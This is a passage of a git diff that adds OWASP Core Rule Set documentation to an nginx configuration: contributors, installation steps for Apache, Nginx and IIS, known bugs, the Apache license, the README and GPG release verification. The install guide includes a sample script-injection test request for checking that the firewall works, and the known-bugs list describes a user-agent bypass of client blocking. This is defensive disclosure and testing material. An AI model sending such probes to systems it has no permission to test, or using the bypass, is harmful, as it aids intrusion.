framework can be used to check for and fix these issues automatically. First, go to the [pre-commit](https://pre-commit.com/) website and download the framework. Then, after installing, use the command `pre-commit install` so that the tools are installed and run each time a commit is made. CRS provides a config file that will keep the repository clean. diff --git a/nginx/config/owasp-crs/CONTRIBUTORS.md b/nginx/config/owasp-crs/CONTRIBUTORS.md new file mode 100644 index 00000000..28f86dfb --- /dev/null +++ b/nginx/config/owasp-crs/CONTRIBUTORS.md @@ -0,0 +1,143 @@ +# Contributors + +## Project Co-Leads: + +- [Christian Folini](https://github.com/dune73) +- [Walter Hop](https://github.com/lifeforms) +- [Felipe Zipitría](https://github.com/fzipi) + +## Developers: + +- [Paul Beckett](https://github.com/53cur3M3) +- [Franziska Bühler](https://github.com/franbuehler) +- [Christoph Hansen](https://github.com/emphazer) +- [Ervin Hegedus](https://github.com/airween) +- [Andrew Howe](https://github.com/RedXanadu) +- [Karel Knibbe](https://github.com/karelorigin) +- [Max Leske](https://github.com/theseion) +- [Andrea Menin](https://github.com/theMiddleBlue) +- [Matteo Pace](https://github.com/M4tteoP) +- [Jitendra Patro](https://github.com/Xhoenix) +- [Chaim Sanders](https://github.com/csanders-git) +- [Federico G. Schwindt](https://github.com/fgsch) +- [Manuel Leos Rivas](https://github.com/spartantri) +- [Simon Studer](https://github.com/studersi) +- [Jozef Sudolský](https://github.com/azurit) + +## Contributors: + +- [agusmu](https://github.com/agusmu) +- [Amir Hosein Aliakbarian](https://github.com/AmirHoseinAliakbarian) +- [Zack Allen](https://github.com/zmallen) +- [azhao155](https://github.com/azhao155) +- [Matt Bagley](https://github.com/bagley) +- [Ryan Barnett](https://github.com/rcbarnett) +- [Soufiane Benali](https://github.com/soufianebenali) +- [Peter Bittner](https://github.com/bittner) +- [Allan Boll](https://github.com/allanbomsft) +- [Jeremy Brown](https://github.com/jwbrown77) +- [Esad Cetiner](https://github.com/esadcetiner/) +- [Brent Clark](https://github.com/brentclark) +- [Jonathan Claudius](https://github.com/claudijd) +- [coolt](https://github.com/coolt) +- [Hussein Daher](https://github.com/hussein98d) +- [Abu Dawud](https://github.com/abudawud) +- [Ashish Dixit](https://github.com/tundal45) +- [Mirko Dziadzka](https://github.com/mirkodziadzka-avi) +- [Padraig Doran](https://github.com/padraigdoran) +- [Dan Ehrlich](https://github.com/danehrlich1) +- [İlteriş Eroğlu](https://github.com/linuxgemini) +- [Umar Farook](https://github.com/umarfarook882) +- [flo405](https://github.com/flo405) +- [Fregf](https://github.com/Fregf) +- [FrozenSolid](https://github.com/frozenSolid) +- [Pásztor Gábor](https://github.com/gpasztor87) +- [Jan Gora](https://github.com/terjanq) +- [Aaron Haaf](https://github.com/Everspace) +- [Michael Haas](https://github.com/MichaelHaas) +- [henkworks](https://github.com/henkworks) +- [Tim Herren](https://github.com/nerrehmit) +- [Victor Hora](https://github.com/victorhora) +- [itsTheFae](https://github.com/itsTheFae) +- [jamuse](https://github.com/jamuse) +- [jeremyjpj0916](https://github.com/jeremyjpj0916) +- [jschleus](https://github.com/jschleus) +- [k4n5ha0](https://github.com/k4n5ha0) +- [kam821](https://github.com/kam821) +- [Katherine](https://github.com/katef) +- [kyzentun](https://github.com/kyzentun) +- [Joost de Keijzer](https://github.com/joostdekeijzer) +- [Krzysztof Kotowicz](https://github.com/koto) +- [Evgeny Marmalstein](https://github.com/shimshon70) +- [meetug](https://github.com/meetug) +- [Christian Mehlmauer](https://github.com/FireFart) +- [Pinaki Mondal](https://github.com/0xinfection) +- [Glyn Mooney](https://github.com/skidoosh) +- [na1ex](https://github.com/na1ex) +- [Jose Nazario](https://github.com/paralax) +- [Scott O'Neil](https://github.com/cPanelScott) +- [NiceYouKnow](https://github.com/NiceYouKnow) +- [nobletrout](https://github.com/nobletrout) +- [Fernando Outeda](https://github.com/fog94) +- [NullIsNot0](https://github.com/NullIsNot0) +- [Robert Paprocki](https://github.com/p0pr0ck5) +- [Christian Peron](https://github.com/csjperon) +- [Elia Pinto](https://github.com/yersinia) +- [pyllyukko](https://github.com/pyllyukko) +- [Brian Rectanus](https://github.com/b1v1r) +- [Vandan Rohatgi](https://github.com/vandanrohatgi) +- [Rufus125](https://github.com/Rufus125) +- Ofer Shezaf +- [Takaya Saeki](https://github.com/nullpo-head) +- Breno Silva +- [Deepshikha Sinha](https://github.com/deepshikha-s) +- siric\_ +- Emile-Hugo Spir +- [somechris](https://github.com/somechris) +- [Marc Stern](https://github.com/marcstern) +- [supplient](https://github.com/supplient) +- [Mike Taylor](https://github.com/miketaylr) +- [ThanhPT](https://github.com/nevol1708) +- [Timo](https://github.com/ntimo) +- [Juan-Pablo Tosso](https://github.com/jptosso) +- [vijayasija99](https://github.com/vijayasija99) +- [Ben Williams](https://github.com/benwilliams) +- [Anna Winkler](https://github.com/annawinkler) +- [Avery Wong](https://github.com/4v3r9) +- [Will Woodson](https://github.com/wjwoodson) +- [Greg Wroblewski](https://github.com/gwroblew) +- [XeroChen](https://github.com/XeroChen) +- [ygrek](https://github.com/ygrek) +- [Yu Yagihashi](https://github.com/yagihash) +- [Felipe "Zimmerle" Costa](https://github.com/zimmerle) +- [Zino](https://github.com/zinoe) +- Josh Zlatin +- [Zou Guangxian](https://github.com/zouguangxian) +- [4ft35t](https://github.com/4ft35t) +- [Andy Clapson](https://github.com/Homesteady) +- [Anuraag Agrawal](https://github.com/anuraaga) +- [Christian Aistleitner](https://github.com/somechris) +- [Dennis Brown](https://github.com/MutableLoss) +- [Dexter Chang](https://github.com/dextermallo) +- [Esa Jokinen](https://github.com/oh2fih) +- [Finn Westendorf](https://github.com/wfinn) +- [Gwendal Le Coguic](https://github.com/gwen001) +- [Jean-François Viguier](https://github.com/jf-viguier) +- [Juan Pablo Tosso](https://github.com/jptosso) +- [Karel](https://github.com/karelorigin) +- [Khiem Doan](https://github.com/khiemdoan) +- [Mark Zeman](https://github.com/KramNamez) +- [Priyam Patel](https://github.com/priyam001) +- [Robert DeBoer](https://github.com/robertdeboer) +- [Somdev Sangwan](https://github.com/s0md3v) +- [Stephen Sigwart](https://github.com/ssigwart) +- [Zerorigin](https://github.com/Zerorigin) +- [Syin Wu](https://github.com/bxlxx) +- [henkdswiss](https://github.com/henkworks) +- [ignatiev](https://github.com/ignatiev) +- [oct0pus7](https://github.com/oct0pus7) +- [Timo](https://github.com/ntimo) +- [rekter0](https://github.com/rekter0) +- [ThanhPT](https://github.com/thanhpt1708) +- [Vandan Rohatgi](https://github.com/vandanrohatgi) +- [NiceYouKnow](https://github.com/NiceYouKnow) diff --git a/nginx/config/owasp-crs/INSTALL b/nginx/config/owasp-crs/INSTALL new file mode 100644 index 00000000..052543fd --- /dev/null +++ b/nginx/config/owasp-crs/INSTALL @@ -0,0 +1,273 @@ + _____ _____ _____ ____ + / ____| __ \ / ____| |___ \ + | | | |__) | (___ __) | + | | | _ / \___ \ |__ < + | |____| | \ \ ____) | ___) | + \_____|_| \_\_____/ |____/ + + OWASP Core Rule Set 3.x + +Installing ModSecurity +===================== + + This document does NOT detail how to install ModSecurity. Rather, + only information pertaining to the installation of the OWASP Core + Rule Set (CRS) is provided. However, ModSecurity is a prerequisite + for the CRS installation. Information on installing ModSecurity + can be found within the ModSecurity project at + https://github.com/SpiderLabs/ModSecurity or at ModSecurity.org. + +Installing From a Package Manager +================================= + + The OWASP Core Rule Set (CRS) is available from many sources. On + multiple platforms this includes package managers. These packages are + maintained by independent packagers who package CRS in their own time. + Historically, many of these packages have been out of date. As such, + it is recommended that you install, where possible, from our GitHub + repository. The following CRS 3.x packages are known to exist: + + modsecurity-crs - Debian + mod_security_crs - Fedora + modsecurity-crs - Gentoo + + Packages of CRS 2.x are incompatible with CRS 3.x. + +Installing +========== + + You can download a copy of the CRS from the following URL: + https://coreruleset.org/installation/ + + Our release zip/tar.gz files are the preferred way to install CRS. + + However, if you want to follow rule development closely and get + the newest protections quickly, you can also clone our GitHub + repository to get the current work-in-progress for the next release. + +Prerequisites +------------- + + CRS is designed to be used with ModSecurity (although many other + projects also use the provided rules). CRS version 3.x is designed for + ModSecurity 2.8 or above. CRS version 3.x makes use of libinjection + and libXML2. Failure to provide these prerequisites may result in + serious false negatives and CRS version 3.x should NOT be run without + these. Note, however, that libinjection is bundled with ModSecurity + since version 2.8. Additionally, if you are downloading from the + GitHub repo you will need to install 'git' on your system. + +Upgrading from CRS 2.x +---------------------- + CRS 3.x is a major release incompatible with CRS 2.x. + The rule IDs have changed. The file id_renumbering/IdNumbering.csv + contains a list with old and new rule IDs. However, a key feature + of the release 3.x is the reduction of false positives in the + default installation and we recommend you start with a fresh + install from scratch. + Key parameter variables have changed their name and new features + have been introduced. Your former modsecurity_crs_10_setup.conf + file is thus no longer usable. + We recommend you to start with a fresh install from scratch. + +Installing on Apache +-------------------- + 1. Install ModSecurity for Apache + 2. Ensure that ModSecurity is loading correctly by checking error.log + at start up for lines indicating ModSecurity is installed. An example + might appear as follows: + ```ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/) configured.``` + 3. The most common method of deploying ModSecurity we have seen is + to create a new folder underneath the Apache directory (typically + /usr/local/apache/, /etc/httpd/, or /etc/apache2). Often this folder + is called 'modsecurity.d'. Create this folder and cd into it. + 4. Download our release from https://coreruleset.org/installation/ + and unpack it into a new owasp-modsecurity-crs folder. + 5. Move the crs-setup.conf.example file to crs-setup.conf. + Please take the time to go through this file and customize the settings + for your local environment. Failure to do so may result in false + negatives and false positives. See the section entitled OWASP CRS + Configuration for more detail. + 6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and + rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the + '.example' extension. This will allow you to add exclusions without updates + overwriting them in the future. + 7. Add the following lines to your httpd.conf/apache2.conf (the following + assumes you've put CRS into modsecurity.d/owasp-modsecurity-crs). You + can alternatively place these in any config file included by Apache: + ``` + + Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf + IncludeOptional modsecurity.d/owasp-modsecurity-crs/plugins/*-config.conf + IncludeOptional modsecurity.d/owasp-modsecurity-crs/plugins/*-before.conf + Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf + IncludeOptional modsecurity.d/owasp-modsecurity-crs/plugins/*-after.conf + + ``` + 8. Restart web server and ensure it starts without errors + 9. Make sure your web sites are still running fine. + 10. Proceed to the section "Testing the Installation" below. + +Installing on Nginx +------------------- + 1. Compile ModSecurity into Nginx + 2. Ensure that ModSecurity is loading correctly by checking error.log + at start up for lines indicating ModSecurity is installed. An example + might appear as follows: + ```ModSecurity for nginx (STABLE)/2.9.1 (http://www.modsecurity.org/) configured.``` + 3. The most common method of deploying ModSecurity we have seen is + to create a new folder underneath the Nginx directory (typically + /usr/local/nginx/conf/). Often this folder + is called 'owasp-modsecurity-crs'. Create this folder and cd into it. + 4. Download our release from https://coreruleset.org/installation/ + and unpack it into a new owasp-modsecurity-crs folder. + 5. Move the crs-setup.conf.example file to crs-setup.conf. + Please take this time to go through this + file and customize the settings for your local environment. Failure to + do so may result in false negatives and false positives. See the + section entitled OWASP CRS Configuration for more detail. + 6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and + rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the + '.example' extension. This will allow you to add exceptions without updates + overwriting them in the future. + 7. Nginx requires the configuration of a single ModSecurity + configuration file within the nginx.conf file using the + 'ModSecurityConfig' directive (when using ModSecurity 2.x). + Best practice is to set 'ModSecurityConfig' to a file from + which you will include your other ModSecurity configuration + files. In this example we will use: + ```ModSecurityConfig modsec_includes.conf;``` + 7. Within modsec_includes.conf create your includes to the + CRS folder similar to as follows (The modsecurity.conf file from the + ModSecurity installation is included in this example): + ``` + Include modsecurity.conf + Include owasp-modsecurity-crs/crs-setup.conf + Include owasp-modsecurity-crs/plugins/*-config.conf + Include owasp-modsecurity-crs/plugins/*-before.conf + Include owasp-modsecurity-crs/rules/*.conf + Include owasp-modsecurity-crs/plugins/*-after.conf + ``` + 8. Restart web server and ensure it starts without errors + 9. Make sure your web sites are still running fine. + 10. Proceed to the section "Testing the Installation" below. + +Installing on IIS +----------------- + The IIS installer comes with an optional version of CRS built in. + To upgrade or install this after the fact follow the following + steps. + 1. Navigate to "[drive_letters]:\Program Files\ModSecurity IIS\" + 2. Download our release from https://coreruleset.org/installation/ + and unpack it into the current folder. + 3. Move the crs-setup.conf.example file to crs-setup.conf. + Please take this time to go through this + file and customize the settings for your local environment. Failure to + do so may result in false negatives and false positives. See the + section entitled OWASP CRS Configuration for more detail. + 4. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and + rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the + '.example' extension. This will allow you to add exceptions without updates + overwriting them in the future. + 5. Navigate back to the 'ModSecurity IIS' folder and modify the + 'modsecurity_iis' to include the following: + ``` + Include owasp-modsecurity-crs/crs-setup.conf + Include owasp-modsecurity-crs/plugins/*-config.conf + Include owasp-modsecurity-crs/plugins/*-before.conf + Include owasp-modsecurity-crs/rules/*.conf + Include owasp-modsecurity-crs/plugins/*-after.conf + ``` + 6. Restart web server and ensure it starts without errors + 7. Make sure your web sites are still running fine. + 8. Proceed to the section "Testing the Installation" below. + +Testing the Installation +======================== + To test your installation you should be able to use any number + of attacks. A typical request which should trigger CRS would be + ```http://localhost/?param=">``` + Upon sending this request you should see events reported in the + error log (nginx apache) or the event viewer (IIS). + + If have not changed the defaults with regards to anomaly scoring, + blocking and sampling percentage, then this request should have + been blocked and access forbidden. Likewise if you have configured + ModSecurity debug logging and/or audit logging this event should + log to these locations as well. + +OWASP CRS Configuration +======================= + The crs-setup.conf file includes management rules + and directives that can control important CRS functions. + The crs-setup.conf file comes with extensive comments. + This section here brings only the essential parts. + + By default we do not include settings within the crs-setup.conf + that configure ModSecurity itself. Instead those configuration + settings are set during the installation of ModSecurity proper. + An example for such such a + configuration file is available via the ModSecurity project + (https://github.com/SpiderLabs/ModSecurity/blob/master/modsecurity.conf-recommended). + Be aware the crs-setup.conf file DOES specify + configuration directives such as SecDefaultAction. The default + is the anomaly scoring mode with the appropriate + SecDefaultAction as defined in the crs-setup.conf. + Alternative configuration modes are supported and explained + in crs-setup.conf. + + The default anomaly/correlation mode establishes an inbound + anomaly score threshold of 5 and an outbound anomaly score + threshold of 4. The default installation has been tuned to + reduce false positives in a way that will allow most requests + to pass in this default setup. + + However, testing the setup and tuning false positives + before going to production is vital. This is especially true + if you raise the paranoia level with is set to 1 by default. + Higher paranoia levels ranging from 2 to 4 include more + aggressive rules which will raise additional false positives + but also raise the security level of your service. + + If you are unsure about the performance impact of the CRS + or if you are unsure about the number of false positives, then + you may want to use the sampling percentage. This number, + which is set to 100 by default, controls the percentage + of requests which is funneled into the CRS. Fresh installs + on high traffic sites are advised to start with a low, or + very low number of percentages and raise the number + slowly up to 100. Be aware that any number below 100 allows + a random number of requests to bypass the ruleset completely. + + Update the TX policy settings for allowed Request Methods, File + Extensions, maximum numbers of arguments, etc to better reflect + your environment that is being protected. + + Make sure your GeoIP and Project Honeypot settings are specified + if you are using them. + The GeoIP database is no longer included with the CRS. Instead + you are advised to download it regularly. + + The use of Project Honeypot requires a + free API key. These require an account but can be obtained at + https://www.projecthoneypot.org/httpbl_configure.php. + + Be sure to check out the other settings present within the + crs-setup.conf file. There are many other options that have to + do with aspects of web application security that are beyond + this document but are well explained in crs-setup.conf. + +OWASP CRS Plugins +================= + Plugins are a way to enhance the CRS rule set with additional + official and also 3rd party rules that integrate with the standard + CRS. + + Plugins are more free in what they do and in the dependencies that + they bring. So we allow plugins to do things that standard CRS + rules are not allowed to do etc. + + Plugins are installed by copying them into the CRS plugins folder. + + A repository with a list of official and 3rd party plugins can be + found at https://github.com/coreruleset/plugin-registry. diff --git a/nginx/config/owasp-crs/KNOWN_BUGS.md b/nginx/config/owasp-crs/KNOWN_BUGS.md new file mode 100644 index 00000000..8984456f --- /dev/null +++ b/nginx/config/owasp-crs/KNOWN_BUGS.md @@ -0,0 +1,49 @@ +# CRS KNOWN BUGS + +## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist + +* https://github.com/coreruleset/coreruleset/issues +or the CRS Google Group at +* https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project + +* There are still false positives for standard web applications in + the default install (paranoia level 1). Please report these when + you encounter them. + False Positives from paranoia level 2 rules are less interesting, + as we expect users to write exclusion rules for their alerts in + the higher paranoia levels. +* Permanent blocking of clients is based on a previous user agent / IP + combination. Changing the user agent will thus allow to bypass + this new filter. The plan is to allow for a purely IP based + filter in the future. +* Apache 2.4 prior to 2.4.11 is affected by a bug in parsing multi-line + configuration directives, which causes Apache to fail during startup + with an error such as: + Error parsing actions: Unknown action: \\ + Action 'configtest' failed. + This bug is known to plague RHEL/Centos 7 below v7.4 or + httpd v2.4.6 release 67 and Ubuntu 14.04 LTS users. + https://bz.apache.org/bugzilla/show_bug.cgi?id=55910 + We advise to upgrade your Apache version. If upgrading is not possible, + we have provided a script in the util/join-multiline-rules directory + which converts the rules into a format that works around the bug. + You have to re-run this script whenever you modify or update + the CRS rules. +* Debian up to and including Jessie lacks YAJL/JSON support in ModSecurity, + which causes the following error in the Apache ErrorLog or SecAuditLog: + 'ModSecurity: JSON support was not enabled.' + JSON support was enabled in Debian's package version 2.8.0-4 (Nov 2014). + You can either use backports.debian.org to install the latest ModSecurity + release or disable rule id 200001. +* As of CRS version 3.0.1, support has been added for the application/soap+xml MIME + type by default, as specified in RFC 3902. OF IMPORTANCE, application/soap+xml is + indicative that XML will be provided. In accordance with this, ModSecurity's XML + Request Body Processor should also be configured to support this MIME type. Within + the ModSecurity project, [commit 5e4e2af](https://github.com/SpiderLabs/ModSecurity/commit/5e4e2af7a6f07854fee6ed36ef4a381d4e03960e) + has been merged to support this endeavour. However, if you are running a modified or + preexisting version of the modsecurity.conf provided by this repository, you may + wish to upgrade rule '200000' accordingly. The rule now appears as follows: + ``` + SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \ + "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" + ``` diff --git a/nginx/config/owasp-crs/LICENSE b/nginx/config/owasp-crs/LICENSE new file mode 100644 index 00000000..3a3da2f5 --- /dev/null +++ b/nginx/config/owasp-crs/LICENSE @@ -0,0 +1,201 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright 2022 Core Rule Set project + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/nginx/config/owasp-crs/README.md b/nginx/config/owasp-crs/README.md new file mode 100644 index 00000000..2b8a0d21 --- /dev/null +++ b/nginx/config/owasp-crs/README.md @@ -0,0 +1,33 @@ +![GHA build v4.0/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v4.0%2Fdev) +![GHA build v3.3/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.3%2Fdev) +![GHA build v3.2/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.2%2Fdev)
+[![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://owasp.org/projects/) +[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1390/badge)](https://bestpractices.coreinfrastructure.org/projects/1390) +[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) + + + +# OWASP ModSecurity Core Rule Set (CRS) + +The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts. + +## CRS Resources + +Please see the [OWASP ModSecurity Core Rule Set page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS. + +## Contributing to the CRS + +We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false-positive alert reports, evasions, usability issues, and suggestions for new detections. + +[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. We will try and address your issue and potentially ask for additional information to reproduce your problem. Please also note that stale issues will be flagged and closed after 120 days. You can search for stale issues with the following [search query](https://github.com/coreruleset/coreruleset/issues?q=label%3A%22Stale+issue%22). + +[Sign up for our Google Group](https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list. + +[Join the #coreruleset channel on OWASP Slack](https://owasp.slack.com/) to chat about the CRS. ([Click here](https://owasp.org/slack/invite) to get an invitation if you are not yet registered on the OWASP slack. It's open to non-members too.) + +## License + +Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. + +The OWASP ModSecurity Core Rule Set is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details. diff --git a/nginx/config/owasp-crs/SECURITY.md b/nginx/config/owasp-crs/SECURITY.md new file mode 100644 index 00000000..f33f8d86 --- /dev/null +++ b/nginx/config/owasp-crs/SECURITY.md @@ -0,0 +1,89 @@ +# Security Policy + +## Supported Versions + +OWASP CRS has two types of releases, Major releases (3.0.0, 3.1.0, 3.2.0 etc.) and point releases (3.0.1, 3.0.2 etc.). +For more information see our [wiki](https://github.com/coreruleset/coreruleset/wiki/Release-Policy). +The OWASP CRS officially supports the two latest point releases with severe security patches. +We are happy to receive and merge PR's that address security issues in older versions of the project, but the team itself may choose not to fix these. +Along those lines, OWASP CRS team may not issue security notifications for unsupported software. + +| Version | Supported | +| --------- | ------------------ | +| 4.0.0-RC1 | :x: | +| 3.3.x | :white_check_mark: | +| 3.2.x | :white_check_mark: | +| 3.1.x | :x: | +| 3.0.x | :x: | +| 2.x | :x: | + +## GPG Signed Releases + +Releases are signed using [our GPG key](https://coreruleset.org/security.asc), (fingerprint: 3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72). You can verify the release using GPG/PGP compatible tooling. + +### Importing the GPG Key + +To get our key using gpg: `gpg --keyserver pgp.mit.edu --recv 0x38EEACA1AB8A6E72` (this id should be equal to the last sixteen hex characters in our fingerprint). +You can also use `gpg --fetch-key https://coreruleset.org/security.asc` directly. + +### Verifying the CRS Release + +Download the release file and the corresponding signature. The following example shows how to do it for `v3.3.2` release: + +```bash +$ wget https://github.com/coreruleset/coreruleset/archive/refs/tags/v3.3.2.tar.gz +$ wget https://github.com/coreruleset/coreruleset/releases/download/v3.3.2/coreruleset-3.3.2.tar.gz.asc +``` + +**Verification**: + +```bash +❯ gpg --verify coreruleset-3.3.2.tar.gz.asc v3.3.2.tar.gz +gpg: Signature made Wed Jun 30 10:05:48 2021 -03 +gpg: using RSA key 36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg: Good signature from "OWASP Core Rule Set " [unknown] +gpg: WARNING: This key is not certified with a trusted signature! +gpg: There is no indication that the signature belongs to the owner. +Primary key fingerprint: 